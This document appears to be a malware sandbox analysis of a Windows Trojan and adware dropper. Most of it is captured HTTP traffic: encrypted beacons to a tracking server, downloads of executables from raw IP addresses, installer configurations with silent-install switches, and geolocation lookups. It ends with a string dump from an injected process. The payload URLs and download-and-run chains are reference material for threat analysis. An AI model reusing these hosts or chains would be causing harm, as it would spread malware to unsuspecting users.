..OB...XaP..`aP..E......)...h.AK.......M....d........]............

<<< skipped >>>

POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtraking.website
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip


HTTP/1.1 100 Continue
....



order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqgotRf5tNyZ/f7EJjH7FqW
kyQ69MSDCskWEPAPd4zKQ9z8QZG51X3uD anObGgA ulRLJNENgb4BlqEoQRcKzWWJP4fG
h0wqpEg8Fp5Eb4n2ihL2777krtw7WWMWeOfCx9JAq6HW00D 8WjhbUYCkYchvFi 3sGoTB
Sjizu/rVKwQ=="


HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Tue, 29 Aug 2017 21:57:39 GMT
Content-Encoding: gzip
14........................0..


GET /black/mirenda/3/default/UA.xml HTTP/1.1
Host: room1.360dev.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Tue, 29 Aug 2017 21:56:58 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 122028
Last-Modified: Tue, 29 Aug 2017 21:30:03 GMT
Connection: keep-alive
ETag: "59a5dcdb-1dcac"
Accept-Ranges: bytes
7k92I2inPflHCBVZUy1dDfuK93Od3aZZ5u05dtKJqxVMLJ5unF436kvxCho6i6BmrLO5g9
UBYDIko4F2swzSRYsSL6QIKntvduhHbI30 kwvh8M0f3XLlvFV/lryeWX2zihnedKEe6SX
ALdPifc559aF1fA5n2j/kaLkAoqw9LDCx1Bb8ZIRPwC4/LB396IjgjLSd7iXRr30NK2ekD
de/4lmwtALQumjkkO1AvAy/xuppZj6wcFIHfzYiQK7nd9y8YfbYO1MmCcWTts77Yfag/JQ
vPMY6seytsMOYbk/4gkW5AWq9AJpwh5yT0ZMg1fCMBb5yXNJkEyWQd3mRl3WK2M1yR6m
MFciUxeqdLKIfMqjxCX9nPusCmkEqAICoAdNM8sAjIq 8p6fJn1WsUaWlKqvJHAsWqwwHw
BkplXeClTmmNzX5jY1m6ds4M5GBIJjEp8prv9UpExkZlZN/puGJDnIbGnURgmNRE9pjhkV
4TrhteKoRhRAzCqIztVHbiJ7MaBf OmIuCXZPea6CgU7Wl6hS9Jvw0uktRU2O w3ze3pJW
qelxvesFW4hK4ESj6KHaZ0FgLjn9KuDHjpNKw91mBFkIaiH ChcrkhOAhT0GA7/4iSpLKD
RMILn4IJCPzLaKK2Wk1O6o7hvNIaEfexsy5HKXLtz ozD1BrTi8LXz/NOmWc8MSf4rKthn
A VTEJxmvovcdgStVsPNOne8dA6FodZlymwdIpjwYgLjeRVxHSO6vP/APfaHtKMdzrCahb
y3HzE/GCB7EB2vAkDVb9MovNdPFuZ6Ilv6Ut7JysyFR4Oq87hlbII5ZNbbw5vWzgeKU9f3
W4IaEWdBrtHmPy7zdgabhwgD/hUFzFSV3Ntg8GmdK14kSXIbdgUktDNSZdY0WU1lTp9dPw
tw883HfFvHK7q2dOc0nl3oa/uwdIiyhxHZ2kqLfEHDqrmGh5Ja14Tz/h06e879D6cRMHfh
FLoHpKrVN1Huz6OioBtTq0XHZWkxumW9AucA7YmX5PnPBM0Xq9jxZoA6Ejq/iJIepsl1si
Bdp2S BvTr7uGYDMIl7ALMF9V/krD95jCmaHwDP2J9QLni5lLnbCWs3L0J95/M/Tz99IB6
m0R0mOv/sOIr7N pNRImcbVulM2m0mh/oWJVoAV5CC7FrQcsLhh6ZUSIBP1R4edcD/o7W7
hjqkQUIwa0fDKbNK5EVIjRD5UIl x6c1nmJJyRCdfrGgb3czAz/oSEaHmZyZkVwhX1cLMM
vJ6FQmOdV JKMJhUu0iW77yxyj5VKtPjNBT JyOSa8h7xKLitc/SIkuF9 r/uJq7K6and
e8J9Q//D7YVXhIVpsRMa8RU7pVfdL3qC UHmisWxhtGl6kI EPjJ2P9fDabWeFb37qN0Vx
i50kvCr6lK676t Vw2ZtGjCobjvNXndK/CvSYv amMgT946DjTy4RZpXApkuOgCGrISLVp
8deVPdBKQZI1CV48dtnfkmszIqo2AAEStqhew3R8szoDuNtdTVJDFViOThvlDaqok

<<< skipped >>>

GET /black/prisonbreak/3/default.xml HTTP/1.1

Host: room1.360dev.info


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Tue, 29 Aug 2017 21:56:59 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 300
Last-Modified: Tue, 29 Aug 2017 21:30:01 GMT
Connection: keep-alive
ETag: "59a5dcd9-12c"
Accept-Ranges: bytes
7k92I2inPflHCBVZUy1dDfuK93Od3aZZ5u05dtKJqxXHjeGWnXg1XhM3eFHz gT8HGVWL1
a3l275CE67m1uTJmHIplji9T3rv2WwyJAaWjxPYUo8U5x/jL/IJ66wkybBNb2pNbOSRdH2
gHg0bo86voenozycTO6p7Q0uBySq5l8LrKL6GyeWDJBuA5t8E97eoRTlOhOzmGRi7Eh3SD
WtRwNli1bT9fc4wMterinBsY2apHAtlNh0LFYaF78PLtKRbbfzesup0U/3ayH9Q7KcAZcl
V ISICRqPs80LZn2b0Y=HTTP/1.1 200 OK..Server: nginx/1.10.3 (Ubuntu)..Da
te: Tue, 29 Aug 2017 21:56:59 GMT..Content-Type: text/xml; charset=utf
-8..Content-Length: 300..Last-Modified: Tue, 29 Aug 2017 21:30:01 GMT.
.Connection: keep-alive..ETag: "59a5dcd9-12c"..Accept-Ranges: bytes..7
k92I2inPflHCBVZUy1dDfuK93Od3aZZ5u05dtKJqxXHjeGWnXg1XhM3eFHz gT8HGVWL1a
3l275CE67m1uTJmHIplji9T3rv2WwyJAaWjxPYUo8U5x/jL/IJ66wkybBNb2pNbOSRdH2g
Hg0bo86voenozycTO6p7Q0uBySq5l8LrKL6GyeWDJBuA5t8E97eoRTlOhOzmGRi7Eh3SDW
tRwNli1bT9fc4wMterinBsY2apHAtlNh0LFYaF78PLtKRbbfzesup0U/3ayH9Q7KcAZclV
ISICRqPs80LZn2b0Y=..


GET /xml/ HTTP/1.1
Host: freegeoip.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 29 Aug 2017 21:56:58 GMT
Content-Type: application/xml
Content-Length: 363
Connection: keep-alive
Set-Cookie: __cfduid=d581a39b5ab13188dd7d153dfba1628871504043818; expires=Wed, 29-Aug-18 21:56:58 GMT; path=/; domain=.freegeoip.net; HttpOnly
Vary: Origin
X-Database-Date: Thu, 03 Aug 2017 06:09:19 GMT
X-Ratelimit-Limit: 15000
X-Ratelimit-Remaining: 14999
X-Ratelimit-Reset: 3600
Server: cloudflare-nginx
CF-RAY: 3962c36757de8ace-KBP
<Response>..<IP>194.242.96.218</IP>..<CountryCode
>UA</CountryCode>..<CountryName>Ukraine</CountryName
>..<RegionCode>63</RegionCode>..<RegionName>Khark
ivs'ka Oblast'</RegionName>..<City>Kharkiv</Cit
y>..<ZipCode></ZipCode>..<TimeZone>Europe/Kiev
</TimeZone>..<Latitude>49.9808</Latitude>..<Longitud
e>36.2527</Longitude>..<MetroCode>0</MetroCode>.
</Response>.HTTP/1.1 200 OK..Date: Tue, 29 Aug 2017 21:56:58 GMT.
.Content-Type: application/xml..Content-Length: 363..Connection: keep-
alive..Set-Cookie: __cfduid=d581a39b5ab13188dd7d153dfba162887150404381
8; expires=Wed, 29-Aug-18 21:56:58 GMT; path=/; domain=.freegeoip.net;
HttpOnly..Vary: Origin..X-Database-Date: Thu, 03 Aug 2017 06:09:19 GM
T..X-Ratelimit-Limit: 15000..X-Ratelimit-Remaining: 14999..X-Ratelimit
-Reset: 3600..Server: cloudflare-nginx..CF-RAY: 3962c36757de8ace-KBP..
<Response>..<IP>194.242.96.218</IP>..<CountryCode
>UA</CountryCode>..<CountryName>Ukraine</CountryName
>..<RegionCode>63</RegionCode>..<RegionName>Khark
ivs'ka Oblast'</RegionName>..<City>Kharkiv</Cit
y>..<ZipCode></ZipCode>..<TimeZone>Europe/Kiev
</TimeZone>..<Latitude>49.9808</Latitude>..<Longitud
e>36.2527</Longitude>..<MetroCode>0</MetroCode>.
</Response>...

<<< skipped >>>

GET /p.ashx?e=szy0EO73D1jnGREG7sgANyQihONqx/i6WB8r2ztgmWgO7l/wy05vug49NnWHhDotcnP 8TnBr fqiaV62hwPcFU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/zEF4Meyc2 EE8SFHLIEPsMWQZi5gE7wZ HTTP/1.1
User-Agent: Moz/5.0 (compatible; MSIE 9.0; Win NT 6.1)
Host: d3jx96othz2l8y.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 22:04:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3c2476383ec2dd20b3b952b944a0f17d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: v_E5UV-Ew9uEr6wONgq1noyrAq8Q-cedPeCGJQjVPmnganF1NjOsDQ==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Tue, 29 Aug 2017 22:04:14 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 3c2476383ec2dd20b3b952b944a0f1
7d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: v_E5UV-Ew9uEr6wONgq1noyrA
q8Q-cedPeCGJQjVPmnganF1NjOsDQ==..
....



GET /p.ashx?e=8r06TjbI24l2M5d6UDxIvgE57R1EcxVK2 Pir6kA/Pnpk06wDwkeQhgWiv4aOiGv14njVTgsdKDHRTk7/hDhlbb8KFWJm4qaK4BZS xKOahiuhqO3CGckWGvtwf75JlcpMdVCGxZIut/5j8mABQj/LhXuFqCFv7nVTlTA7N8SCd9rpVF7L2m5voso8xPlhHGo8OVPqrD/WaXHlhgkkBVkg==&action=START&actionparam=ARE:8; C:\Users\"%CurrentUserName%"\AppData\Local\Temp\18d11d6bcfa143319d89ee15d7989e1c\brastub6ab_amobl_inst.exe /S /MAG=AMOBL /SUB=20544 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d3jx96othz2l8y.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 22:04:22 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3c2476383ec2dd20b3b952b944a0f17d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CPYTPBrf9t2o9NLNjG0GihcnZJiXBbVu0cERde0Jv_6UgeIIgkkMeQ==
....



GET /p.ashx?e=8r06TjbI24l2M5d6UDxIvgE57R1EcxVK2 Pir6kA/Pnpk06wDwkeQhgWiv4aOiGv14njVTgsdKDHRTk7/hDhlbb8KFWJm4qaK4BZS xKOahiuhqO3CGckWGvtwf75JlcpMdVCGxZIut/5j8mABQj/LhXuFqCFv7nVTlTA7N8SCd9rpVF7L2m5voso8xPlhHGo8OVPqrD/WaXHlhgkkBVkg==&action=FINISH&actionparam=ARE:8; C:\Users\"%CurrentUserName%"\AppData\Local\Temp\18d11d6bcfa143319d89ee15d7989e1c\brastub6ab_amobl_inst.exe /S /MAG=AMOBL /SUB=20544 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d3jx96othz2l8y.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 22:04:22 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3c2476383ec2dd20b3b952b944a0f17d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: jw5TMA_BWjSv-8xcRJDBeOcovy_y5ydH_qpi-ERlPu0gPrbf4tEM4Q==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Tue, 29 Aug 2017 22:04:22 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 3c2476383ec2dd20b3b952b944a0f1
7d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: jw5TMA_BWjSv-8xcRJDBeOcov
y_y5ydH_qpi-ERlPu0gPrbf4tEM4Q==..


POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtraking.website
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip


HTTP/1.1 100 Continue
....



order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqg/jPQP1pu3sTGpb0Hj/e8
DguO5h2QIypjgMLA7XWg5QsSYtDcDZTFE9j7whmUXsKoEwslTckai/6OuNScmwY//8 TPy
6kQfO0tNtwz4N0wpffpqT4vGUnSBpQxySy0 f EHe/fJlwUITywYm7gkCHyu5lOnU96cpv
nfMkrwa0K9g=="


HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Tue, 29 Aug 2017 21:57:34 GMT
Content-Encoding: gzip
14........................0..


GET /gib_1_m_baty.exe HTTP/1.1
Host: 132.148.91.227
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 29 Aug 2017 21:57:40 GMT
Content-Type: application/octet-stream
Content-Length: 2538191
Last-Modified: Tue, 29 Aug 2017 00:00:02 GMT
Connection: keep-alive
Keep-Alive: timeout=15
ETag: "59a4ae82-26bacf"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........D..W%..W%..
W%..Zw~.B%..ZwA.8%..Zw@.~%..^]2.^%..W%...%....D.S%......V%..RichW%....
......PE..L.....OY.............................F............@.........
..............................@..................................|..d.
..............................X....................................e..
@...............,............................text.....................
.......... ..`.rdata...x.......z..................@..@.data...........
.....z..............@....reloc..X............\..............@..B......
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................h..D..e2..Y.h..D..Y2..Y.h.
.D..M2..Y..f..........U...E..8.u.3.]..P...@..u. .].U...E..V......D.t.V
.A2..Y..^]...U...U..A.;B.u...;.u.3.@..3.]...U...E..U....H.]...U..QQ.u.
...U..u.R.P..........]...U...E.;H.u...;E.u.3.@..3.].....dD..U..Q.u..e.
..O(..Y....eD..E.Q.M..|}...E...].....eD..U..Q.e...}..u..M.h.eD..R}....
.u..u.......E...]....4eD..U..Q.u..e....(..Y....eD..E.Q.M...}...E...]..
.U..V.u.V..'.....E.Y.0t..@.<oQ....@.8oQ.^]...U..Q..E...t..E..E..E..
....j.j.....D...].U.......E...t4.E..E..E..E..E..E..E.P.E.P.E.Pj.j.

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: s2.symcb.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1763
content-transfer-encoding: binary
Cache-Control: max-age=531699, public, no-transform, must-revalidate
Last-Modified: Tue, 29 Aug 2017 01:35:56 GMT
Expires: Tue, 5 Sep 2017 01:35:56 GMT
Date: Tue, 29 Aug 2017 21:57:46 GMT
Connection: keep-alive
0..........0..... .....0......0...0.......WI.....L.c=...r..7Z..2017082
9013556Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..Q?.t8p.4@A.0........20170829013556Z....20170905013556Z0...*.H.....
...........`..O.z`........H....|...?.a..5...}..u^..X"......J....*.zM..
..^..2d...0s..b_....c.*....g....G...T..<...m.w._..I......1.jJB.c...
ya2..DF.za0...A.F..iC.......eL=.!.....)...A.T.....`y........i...A..R@.
CvZ/.....G..,..!.m.q........\ !..m.z(}....eI@.%...n.O........0...0...0
..........^..)......<...T.0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 Ve
riSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 P
ublic Primary Certification Authority - G50...161122000000Z..171214235
959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec
Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Cert
ificate 50.."0...*.H.............0.............................m..|...
.....1rUZN.b.......t. d......O...NY.lR..k .Q.z.g.4(,...Rp.7...0C.j.)Z.
....... ~..3...x.b.-..... S^0<6...!.(..2}...T.fX}...6...(...1...#..
H..|`.yy.<B.z.q$......u.-..K.!......y..8..--....?.,.[.[...5.e.4....
.D..t.;....).J....\fV..G.........0...0...U.......0.0l..U. .e0c0a..`.H.
..E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...http:
//VVV.symauth.com/rpa0...U.%..0... .......0...U...........0... .....0.
.....0"..U....0...0.1.0...U....TGV-OFF-500...U.......WI.....L.c=...r..
7Z0...U.#..0.....e......0..C9...3130...*.H.............<wN..g..

<<< skipped >>>

GET /anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RkUyMTg1RjcyMjdFMjZCNzQyN0Y4NENGNThEQjYyNzM5RDQ0NzJBODA1Q0U2MDFCNjQ3MDk3MThFMkRDOThCOTk= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:41 GMT
Connection: close
Content-Length: 0


GET /download/APSnapdoAMRev HTTP/1.1
Host: install.rgbcjfir.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: hXXp://cdn.piytrwd.com/apdata/installers/auto/exe/starter.exe
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:56:58 GMT
Content-Length: 178
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://cdn.p
iytrwd.com/apdata/installers/auto/exe/starter.exe">here</a>.
</h2>..</body></html>..HTTP/1.1 302 Found..Cache-Cont
rol: private..Content-Type: text/html; charset=utf-8..Location: http:/
/cdn.piytrwd.com/apdata/installers/auto/exe/starter.exe..Server: Micro
soft-IIS/8.5..X-AspNetMvc-Version: 5.0..X-AspNet-Version: 4.0.30319..X
-Powered-By: ASP.NET..Date: Tue, 29 Aug 2017 21:56:58 GMT..Content-Len
gth: 178..<html><head><title>Object moved</title
></head><body>..<h2>Object moved to <a href="ht
tp://cdn.piytrwd.com/apdata/installers/auto/exe/starter.exe">here
</a>.</h2>..</body></html>....


GET /Update/CheckInstallConfig?deviceid=662bd40f-c794-5fc7-424c-6f9ff3eb0b27&distributer=APSnapdoAMRev&channelid=3&barcodeid=50027003&country=UA&encrypt=True HTTP/1.1
Host: updates.utyuytjn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json; charset=utf-8
Expires: Tue, 29 Aug 2017 21:58:11 GMT
Last-Modified: Tue, 29 Aug 2017 21:57:11 GMT
Vary: *
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:11 GMT
Content-Length: 278
[{"Distributer":"APSnapdoAMRev","ChannelID":"*","BarcodeID":"*","Count
ry":"*","Type":"InstallConfig","Version":"1.0.0.0","Name":"","Url":"ht
tp://cdn.ijnewhb.com/apdata/installers/installer/installers-config/sna
pdo-ap/apsnapdoamrev/ic170817.xml","ApName":"Ronzap","RangeStr":""}]HT
TP/1.1 200 OK..Cache-Control: public, max-age=60..Content-Type: applic
ation/json; charset=utf-8..Expires: Tue, 29 Aug 2017 21:58:11 GMT..Las
t-Modified: Tue, 29 Aug 2017 21:57:11 GMT..Vary: *..Server: Microsoft-
IIS/8.5..X-AspNetMvc-Version: 5.0..X-AspNet-Version: 4.0.30319..X-Powe
red-By: ASP.NET..Date: Tue, 29 Aug 2017 21:57:11 GMT..Content-Length:
278..[{"Distributer":"APSnapdoAMRev","ChannelID":"*","BarcodeID":"*","
Country":"*","Type":"InstallConfig","Version":"1.0.0.0","Name":"","Url
":"hXXp://cdn.ijnewhb.com/apdata/installers/installer/installers-confi
g/snapdo-ap/apsnapdoamrev/ic170817.xml","ApName":"Ronzap","RangeStr":"
"}]..


GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ5MTJCODE4OUEzRjg1MDAxNEY3OUE5MTZEM0Y0Qzg3RjIxM0Y4NDZGNEQyMzY4NDNDODdDQjlCQkI3QTY3REZENUIyRUNGNDA1NUUxRDMyNkJGQTg5QTUyMDk0MjZGRDRCQjM2QzhCRkJBMDI3OTA0MDM2RjM0Q0ZFRjgxRDgyMjg5MTE4ODg4QUI2MDk5M0U2Q0I4OUY4Q0NFNTY4Q0Q4Qjg3ODRGMUQ5QTAwOUI3OEQ1RjNFRURCQzk0ODUyMjc= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 29 Aug 2017 21:57:40 GMT
Connection: close
Content-Length: 0


GET hXXp://json.fveocylq.net/?adv_id=334&domain=FVEocYlq.net&event=2&ip=52.1.45.42:80&pub_id=542&offer_version=1.8&dotnet=4&osver=6.1&dwb=iexplore&lang=en&w64=0 HTTP/1.1
Host: json.fveocylq.net


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 29 Aug 2017 21:57:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
77a..{.."advID":334,.."primaryOfferInstallPath":"hXXp://198.12.157.55/
ytab_m_1_big.exe",.."secondaryOfferInstallPath":"hXXp://198.12.157.55/
ytab_m_1_big.exe",.."requireUnzip":false,.."requireSuccessInstallCheck
":true,.."requireExitCodeCheck":false,.."successExitCode":0,.."constPa
rams":"/S /kr /site_id=743",.."mappedParams":[...],.."requireRegKeysCh
eck":true,.."regKeysToCheck":[ .."LocalMachine\\SOFTWARE\\Microsoft\\W
indows\\CurrentVersion\\Uninstall\\FF20459C-DA6E-41A7-80BC-8F4FEFD9C57
5",."LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Unins
tall\\6E727987-C8EA-44DA-8749-310C0FBE3C3E",."LocalMachine\\SOFTWARE\\
Microsoft\\Windows\\CurrentVersion\\Uninstall\\E3605470-291B-44EB-8648
-745EE356599A",."LocalMachine\\SOFTWARE\\Wow6432Node\\Microsoft\\Windo
ws\\CurrentVersion\\Uninstall\\FF20459C-DA6E-41A7-80BC-8F4FEFD9C575",.
"LocalMachine\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersi
on\\Uninstall\\6E727987-C8EA-44DA-8749-310C0FBE3C3E",."LocalMachine\\S
OFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\E
3605470-291B-44EB-8648-745EE356599A"..],.."minutesToSleepBeforeInstall
":0,.."preInstallRegCheck": true,.."preInstallRegKeys": [. ."LocalMac
hine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FF20459
C-DA6E-41A7-80BC-8F4FEFD9C575",."LocalMachine\\SOFTWARE\\Microsoft\\Wi
ndows\\CurrentVersion\\Uninstall\\6E727987-C8EA-44DA-8749-310C0FBE3C3E
",."LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninst
all\\E3605470-291B-44EB-8648-745EE356599A",."LocalMachine\\SOFTWAR

<<< skipped >>>

GET /ytab_m_1_big.exe HTTP/1.1
Host: 198.12.157.55
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 29 Aug 2017 21:57:43 GMT
Content-Type: application/octet-stream
Content-Length: 2527456
Last-Modified: Tue, 29 Aug 2017 07:00:03 GMT
Connection: keep-alive
Keep-Alive: timeout=15
ETag: "59a510f3-2690e0"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........D..W%..W%..
W%..Zw~.B%..ZwA.8%..Zw@.~%..^]2.^%..W%...%....D.S%......V%..RichW%....
......PE..L....".Y.............................F............@.........
..............................@..................................|..d.
..............................X....................................e..
@...............,............................text.....................
.......... ..`.rdata...x.......z..................@..@.data...........
.....z..............@....reloc..X............\..............@..B......
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................h..D..e2..Y.h..D..Y2..Y.h.
.D..M2..Y..f..........U...E..8.u.3.]..P...@..u. .].U...E..V......D.t.V
.A2..Y..^]...U...U..A.;B.u...;.u.3.@..3.]...U...E..U....H.]...U..QQ.u.
...U..u.R.P..........]...U...E.;H.u...;E.u.3.@..3.].....dD..U..Q.u..e.
..O(..Y....eD..E.Q.M..|}...E...].....eD..U..Q.e...}..u..M.h.eD..R}....
.u..u.......E...]....4eD..U..Q.u..e....(..Y....eD..E.Q.M...}...E...]..
.U..V.u.V..'.....E.Y.0t..@.<oQ....@.8oQ.^]...U..Q..E...t..E..E..E..
....j.j.....D...].U.......E...t4.E..E..E..E..E..E..E.P.E.P.E.Pj.j.

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_1796_rwx_0014C000_00001000:

%Sjj^

%original file name%.exe_1796_rwx_001E0000_0000B000:

F.aj]

SearchProtocolHost.exe_2696:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
